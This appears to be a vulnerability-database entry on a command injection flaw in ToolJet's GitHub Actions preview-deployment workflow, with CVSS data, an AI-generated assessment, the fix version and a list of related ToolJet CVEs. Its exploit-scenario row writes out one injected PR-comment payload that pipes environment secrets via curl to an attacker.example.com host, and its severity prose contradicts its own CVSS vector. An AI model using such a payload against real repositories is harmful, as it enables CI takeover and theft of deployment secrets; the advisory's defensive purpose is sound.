Severity by source
AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Attack is internet-reachable via GitHub PR comment requiring no authentication (AV:N, PR:N, AC:L); arbitrary CI runner command execution and deployment secret exfiltration justify C:H and I:H with scope change.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Lifecycle Timeline
2DescriptionCVE.org
ToolJet is an open-source low-code platform for building internal tools. Prior to 3.20.180, ToolJet's render preview deployment workflow interpolates github.event.comment.body directly into a bash conditional in a run step, allowing any GitHub user who can comment on an open pull request with a deploy command to execute shell commands on the CI runner and exfiltrate deployment secrets. This issue is reported as fixed in version 3.20.180.
AnalysisAI
Command injection in ToolJet's GitHub Actions render preview deployment workflow allows any GitHub user capable of commenting on an open pull request to execute arbitrary shell commands on the CI runner and exfiltrate deployment secrets. The root cause is unsanitized interpolation of github.event.comment.body directly into a bash conditional within a run step, meaning a single malicious PR comment can pivot to full CI runner compromise. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The ToolJet render preview deployment workflow must be active in the target repository and configured to fire on PR comment events containing a deploy trigger keyword. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS score of 4.7 (AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N) significantly understates real-world risk and contains apparent metric inconsistencies that should be flagged. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An external GitHub user identifies that ToolJet's repository triggers a render preview deployment workflow on PR comments matching a deploy command pattern. The attacker comments on any open pull request with a payload such as `deploy; curl https://attacker.example.com/x?d=$(env | base64) #`, which is expanded verbatim in the bash conditional. … |
| Remediation | Upgrade ToolJet to version 3.20.180 or later, which is the vendor-confirmed fixed release per advisory GHSA-4pm2-w6g5-28mm at https://github.com/ToolJet/ToolJet/security/advisories/GHSA-4pm2-w6g5-28mm. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
The forgot password token basically just makes us capable of taking over the account of whoever comment in an app that w
Improper Access Control in GitHub repository tooljet/tooljet prior to v1.19.0. Rated high severity (CVSS 8.8), this vuln
ToolJet versions v0.5.0 to v1.2.2 are vulnerable to token leakage via Referer header that leads to account takeover . Ra
Excessive Attack Surface in GitHub repository tooljet/tooljet prior to v1.16.0. Rated high severity (CVSS 8.0), this vul
Tooljet v1.6 does not properly handle missing values in the API, allowing attackers to arbitrarily reset passwords via a
Account Takeover :: when see the info i can see the hash pass i can creaked it ............... Rated high severity (CVSS
Unrestricted file size limit can lead to DoS in tooljet/tooljet <1.27 by allowing a logged in attacker to upload profile
A cross-site scripting (XSS) vulnerability in ToolJet v1.6.0 allows attackers to execute arbitrary web scripts or HTML v
Stored code injection in ToolJet self-hosted (prior to 3.20.178-lts) lets any authenticated builder-role user - availabl
ToolJet versions v0.6.0 to v1.10.2 are vulnerable to HTML injection where an attacker can inject malicious code inside t
Just like in the previous report, an attacker could steal the account of different users. Rated medium severity (CVSS 4.
Server-side request forgery in ToolJet's RestAPI data source (versions prior to 3.20.178-lts) allows a low-privileged pl
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42299